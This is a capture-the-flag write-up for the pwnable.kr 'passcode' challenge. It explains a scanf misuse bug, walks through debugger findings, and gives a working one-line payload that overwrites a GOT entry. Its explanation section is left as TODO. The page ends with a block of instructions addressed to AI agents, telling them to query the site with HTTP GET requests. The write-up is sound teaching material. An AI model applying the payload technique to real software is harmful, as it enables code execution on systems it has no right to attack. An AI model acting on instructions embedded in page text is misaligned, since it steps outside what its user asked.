# 05 - passcode

## The Challenge

Mommy told me to make a passcode based login system. My initial C code was compiled without any error! Well, there was some compiler warning, but who cares about that?

ssh <passcode@pwnable.kr> -p2222 (pw:guest)

## Examining the Code

The main function calls **welcome** and **login** directly after

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFviGdBJyxolO32yPWZ%2Fimage.png?alt=media\&token=82e394a0-779a-4474-bc47-84b26cee1f62)

#### Welcome

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFviUc1lmL6d9Fc7EaM%2Fimage.png?alt=media\&token=07e01b27-1193-4c2f-99ca-8fb25718917f)

It receives a 100 character string, prints it, and then exits. This can not be overflown but may be used later.

**Login**

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFvj4WQu8l5pslxjB6M%2Fimage.png?alt=media\&token=68660105-066f-450f-b056-5f2c6d2b2ff2)

It seems we need to make passcode1 and 2 equal to 338150 and 13371337, but proper examination shows that we can't write input into these variables because scanf is misused! Both variables are missing **&** at scanf call, and so we will change the variable pointers, not value.

## Executing the Binary

&#x20;**First execution - passcode1 is a number**

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFvn-PuvMSHIjOLoIWI%2Fimage.png?alt=media\&token=80902ee9-0c00-43e6-a03b-78fe828b7ed4)

**Second execution - passcode1 is a string**

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFvn72ec7QDVEIxWVgK%2Fimage.png?alt=media\&token=0bc47b91-a453-4818-a64d-3627bc193e7d)

It seems the program is not interacting properly with regular input. What's going on?

Let's debug this thing.

## Debugging

We'll examine the stack at the beginning of **login** after inputting the longest allowed input, all made of 'a'.

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFvozq5PP2AJyDHWFzL%2Fimage.png?alt=media\&token=410d9448-b091-418b-9bb7-cb8fc651f868)

Some of the input made its way here. Does this help us? Look closely

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFvp_zEFdWBawMv8iM0%2Fimage.png?alt=media\&token=af65eb90-29e8-450e-8908-bd74fe85ab3c)

This is the location of passcode1. What do we find there?

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFvqrIjFUnwf-K2luw8%2Fimage.png?alt=media\&token=c2500498-bcac-44b6-87ff-e9277e5093d4)

The last four bytes of our input! So, we can control the value of passcode1. What can be done with it?

If you recall the examination of the code, the value requested from the user will be written to the location pointed by passcode1. Where should we make it point?

## The GOT Table

***TODO***

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFvsVRj1MZom0BwHVGH%2Fimage.png?alt=media\&token=cf958d21-cdf7-4435-af2c-a2abc345e550)

```
r < <(python3 -c "import sys; sys.stdout.buffer.write(b'\x41' * 96 + b'\x04\xa0\x04\x08\n' + b'134514135')")
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://nickbhe.gitbook.io/shikata-ga-nai/pwnable.kr/05-passcode.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.